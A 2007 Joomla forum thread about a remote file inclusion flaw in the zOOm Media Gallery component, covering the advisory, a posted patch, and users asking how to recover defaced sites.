The Joomla! Forum ™





Post new topic Reply to topic  [ 13 posts ] 
Author Message
PostPosted: Sat Apr 14, 2007 12:26 pm 
User avatar
Joomla! Master
Joomla! Master

Joined: Fri Aug 12, 2005 7:19 am
Posts: 10525
Location: Leeds, UK
A vulnerability has been identified in zOOm Media Gallery , which could be exploited by remote attackers to execute arbitrary commands. This issue is due to an input validation error in the "lib/iptc/EXIF_Makernote.php" script that does not validate the "mosConfig_absolute_path" parameter, which could be exploited by remote attackers to include malicious PHP scripts and execute arbitrary commands with the privileges of the web server.

Source  http://www.frsirt.com/english/advisories/2007/1353

_________________
"Exploited yesterday... Hacked tomorrow"
Blog http://brian.teeman.net/
Joomla Hidden Secrets http://hiddenjoomlasecrets.com/


Top
 Profile  
 
PostPosted: Sat Apr 14, 2007 9:17 pm 
User avatar
Joomla! Apprentice
Joomla! Apprentice

Joined: Sat Aug 20, 2005 3:59 pm
Posts: 7
I already knew about this vulnerability in ZMG, and I fixed it a while back too... It just hasn't been released yet - because I didn't have the time to do it!

To be honest, I don't have the time anymore to work on ZMG. I need some developers... and fast! You know anyone? :P


Top
 Profile  
 
PostPosted: Sat Apr 14, 2007 9:58 pm 
User avatar
Joomla! Master
Joomla! Master

Joined: Fri Aug 12, 2005 7:19 am
Posts: 10525
Location: Leeds, UK
Sorry Mike,not my strongpoint.

Maybe put a post asking for developers in another part of the forum

_________________
"Exploited yesterday... Hacked tomorrow"
Blog http://brian.teeman.net/
Joomla Hidden Secrets http://hiddenjoomlasecrets.com/


Top
 Profile  
 
PostPosted: Sun Apr 15, 2007 5:07 pm 
Joomla! Fledgling
Joomla! Fledgling

Joined: Mon Feb 26, 2007 7:13 am
Posts: 2
mikedeboer wrote:
I already knew about this vulnerability in ZMG, and I fixed it a while back too... It just hasn't been released yet - because I didn't have the time to do it!

To be honest, I don't have the time anymore to work on ZMG. I need some developers... and fast! You know anyone? :P

Hi Mike where I can sign-up.


Top
 Profile  
 
PostPosted: Mon Apr 16, 2007 8:30 am 
User avatar
Joomla! Apprentice
Joomla! Apprentice

Joined: Sat Aug 20, 2005 3:59 pm
Posts: 7
Thanks Brian, I will.

ZZzzzz wrote:
Hi Mike where I can sign-up.


If it's possible, could you send a short resumee (or something listing your experience) to 'mike AT zoomfactory DOT org'...or simply PM me :)


Top
 Profile  
 
PostPosted: Mon Apr 16, 2007 1:13 pm 
Joomla! Fledgling
Joomla! Fledgling

Joined: Mon Feb 26, 2007 7:13 am
Posts: 2
To fix the security please update the EXIF_Makernote.php and EXIF.php with the ones include in this attachment.
Put it in the /components/com_zoom/lib/iptc/

a new release will be available soon on the zoom factory website

http://www.zoomfactory.org


You do not have the required permissions to view the files attached to this post.


Top
 Profile  
 
PostPosted: Thu May 03, 2007 10:44 pm 
Joomla! Apprentice
Joomla! Apprentice

Joined: Mon Dec 05, 2005 11:04 am
Posts: 12
brian wrote:
which could be exploited by remote attackers to include malicious PHP scripts and execute arbitrary commands with the privileges of the web server.


I suppose that includes putting an .asp file containing facilities to examine your site files and deface it anytime (see attached screenshot)? Or should I be looking for something else here?

It worries me that once they put that file on your site, they can get your db details from configuration.php. You can imagine they can get whatever ftp account details are stored unprotected in any of the php files, for example in file safemode.php which is used by ZoomGallery component for allowing image uploading when/if safe mode is set to on, which many hosting providers still do today...

Any solution to protecting the db account details? How does Joomla address this, i.e. information in configuration.php being exposed? I know upgrading to the latest Joomla version and the latest versions of 3rd party add-ons is critical but there will always be security flaws to fix surely.

Regards,

A.Fraile

EDIT MOD: image doing publicity for hacker removed. No need to help the hackers.  ;)


Last edited by infograf768 on Wed May 30, 2007 7:23 am, edited 1 time in total.

Top
 Profile  
 
PostPosted: Sun Jul 08, 2007 11:10 am 
Joomla! Apprentice
Joomla! Apprentice

Joined: Thu Mar 30, 2006 10:55 am
Posts: 44
ZZzzzz wrote:
To fix the security please update the EXIF_Makernote.php and EXIF.php with the ones include in this attachment.
Put it in the /components/com_zoom/lib/iptc/ a new release will be available soon on the zoom factory website
http://www.zoomfactory.org


Bit confused but if I understand right from Zoom forum messages.

1. The hack will not work if register globals is set off in both php as well as globals.php?
2. If using rc4 or prior your patch should be applied? Is the patch applied in the lastest Zoom download on the Zoom website why is the patch not available from the official Zoom website?


Top
 Profile  
 
PostPosted: Fri Dec 28, 2007 6:04 pm 
Joomla! Fledgling
Joomla! Fledgling

Joined: Fri Dec 28, 2007 5:55 pm
Posts: 3
Hi!!

need urgent help! my site has been defaced! a gif picture had been added to the ZMG main page between 2 of my galleries. How can I get rid of it?


Top
 Profile  
 
PostPosted: Fri Dec 28, 2007 7:35 pm 
Joomla! Apprentice
Joomla! Apprentice

Joined: Thu Mar 30, 2006 10:55 am
Posts: 44
cadenza wrote:
Hi!! need urgent help! my site has been defaced! a gif picture had been added to the ZMG main page between 2 of my galleries. How can I get rid of it?


Can we have some more information which version are you using, did you apply the security patch posted by Mike, your security settings globals etc…


Top
 Profile  
 
PostPosted: Sat Dec 29, 2007 4:16 am 
Joomla! Fledgling
Joomla! Fledgling

Joined: Fri Dec 28, 2007 5:55 pm
Posts: 3
I am currently using ver 2.5.1 RC1. Nope, yet to apply the files. Pardon me to ask where to find the 2 update files mentioned earlier on in this thread?

any idea how I can remove the inserted gif inbetween my photo galleries? which file has been changed in ZMG directory? I know the file name of the inserted picture but do seem to be able to locate it in my server directories/files...

Thanks in advanced!


Top
 Profile  
 
PostPosted: Sun Dec 30, 2007 1:25 pm 
Joomla! Apprentice
Joomla! Apprentice

Joined: Thu Mar 30, 2006 10:55 am
Posts: 44
cadenza wrote:
I am currently using ver 2.5.1 RC1. Nope, yet to apply the files. Pardon me to ask where to find the 2 update files mentioned earlier on in this thread? any idea how I can remove the inserted gif inbetween my photo galleries? which file has been changed in ZMG directory? I know the file name of the inserted picture but do seem to be able to locate it in my server directories/files...


There is a vulnerability [1] in all version prior to 2.5.1 RC4. I would start by removing your current version since it is hard to tell which files have been compromised and load the latest version from the Zoom website [2]. For the patch posted in this thread you have to login, the second message from ZZzzzz (April 16, 2007, 09:13:21 AM) contains file.

[1] http://help.joomla.org/component/option,com_easyfaq/task,view/id,186/Itemid,268/
[2] http://www.zoomfactory.org/index.php?option=com_remository&Itemid=61&func=select&id=1


Top
 Profile  
 
PostPosted: Sun Dec 30, 2007 2:37 pm 
Joomla! Fledgling
Joomla! Fledgling

Joined: Fri Dec 28, 2007 5:55 pm
Posts: 3
Thanks! but is there a way to do it so that my existing galleries will remain? ie. upgrade instead of a re-installation?


Top
 Profile  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  [ 13 posts ] 



Who is online

Users browsing this forum: No registered users and 3 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Jump to:  
Powered by phpBB® Forum Software © phpBB Group